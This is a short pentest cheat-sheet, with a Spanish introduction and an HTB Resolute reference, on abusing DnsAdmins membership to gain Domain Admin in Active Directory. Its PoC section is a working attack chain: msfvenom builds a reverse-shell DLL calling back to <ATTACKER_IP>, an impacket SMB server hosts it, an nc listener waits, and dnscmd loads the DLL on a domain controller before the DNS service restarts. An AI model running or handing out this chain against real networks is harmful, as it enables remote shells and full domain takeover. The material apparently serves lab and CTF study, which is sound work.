DnsAdmins to DomainAdmin

Introduction

El grupo DnsAdmins en Windows permite gestionar el servicio DNS en controladores de dominio. Sin embargo, los usuarios de este grupo pueden cargar y ejecutar una DLL personalizada con privilegios elevados a través de funciones del servicio DNS. Esto lo convierte en un método viable para la escalación de privilegios en entornos de Active Directory.

---

PoC

On Kali

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=443 -f dll -o pwn.dll

impacket-smbserver smbFolder $(pwd) -smb2support

rlwrap -cAr nc -nlvp 443

On Windows

dnscmd.exe /config /serverlevelplugindll \\<ATTACKER_IP>\smbFolder\pwn.dll

sc.exe stop dns

sc.exe start dns

---

References

• DnsAdmins to Domain Admin - https://www.hackingarticles.in/windows-privilege-escalation-dnsadmins-to-domainadmin/
• HTB Resolute - https://kogre.gitbook.io/gzzcoo/windows/active-directory/medium/resolute